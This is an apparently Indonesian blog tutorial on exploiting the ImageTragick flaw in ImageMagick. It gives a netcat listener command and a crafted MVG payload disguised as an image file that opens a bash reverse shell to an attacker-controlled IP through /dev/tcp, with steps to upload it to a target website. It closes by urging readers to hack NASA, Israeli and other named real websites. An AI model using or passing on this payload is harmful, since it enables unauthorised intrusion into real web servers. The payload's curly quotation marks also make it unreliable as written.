Reverse Shell From ImageTragick Exploitation

ImageMagick sendiri adalah sebuah perangkat lunak grafis yang gratis. Kemampuannya antara lain mampu membuat, memodifikasi dan menampilkan gambar-gambar bitmap serta mampu membaca, melakukan konversi dan menulis ke dalam berbagai format gambar yang berbeda.

Oke langsung saja ke langkah langkahnya. Disini saya harap kalian sudah menyiapkan vps atau bisa juga ip statis karena akan kita gunakan untuk mendapatkan reverse shell.

1. Masukkan command seperti dibawah ini, fungsinya agar VPS kita dapat menerima backconnect dari server web target

nc -lvp 1337

2. Copas command dibawah ini ke notepad, dan simpan dalam bentuk JPG/PNG/GIF (sesuai dengan extensi yang diperbolehkan)

push graphic-context
viewbox 0 0 840 780
fill ‘url(https://127.0.0.0/oops.jpg”; bash -i >&/dev/tcp/121.191.121.42/1337 0>&1; touch “hello)’
pop graphic-context

* Ganti 121.191.121.42 sesuai dengan server kita

3. Upload file tersebut ke web target

4. Klick Add Screenshot 

kalian bisa mencoba untuk meng hack website nasa & israel DLL 

1cak.com juga bisa 

visit juga yaa : The Real